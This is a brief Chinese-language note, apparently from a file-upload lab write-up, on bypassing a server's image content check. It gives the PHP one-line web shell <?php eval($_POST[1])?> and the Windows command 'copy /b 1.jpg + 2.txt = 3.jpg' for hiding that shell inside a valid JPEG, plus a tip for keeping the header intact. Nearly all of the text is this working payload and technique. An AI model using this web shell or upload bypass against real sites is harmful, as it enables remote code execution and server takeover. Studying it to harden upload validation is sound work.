漏洞名称:校验文件内容
漏洞解析:构造图片马上传 1.jpg 为一张图片, 2.txt 内容为 一句话 <?php eval($_POST[1])?> 打开cmd 执行 copy /b 1.jpg + 2.txt = 3.jpg 3.jpg就是最终文件,注意:2.txt文件头部留一个空格,避免合并的时候被吃掉.
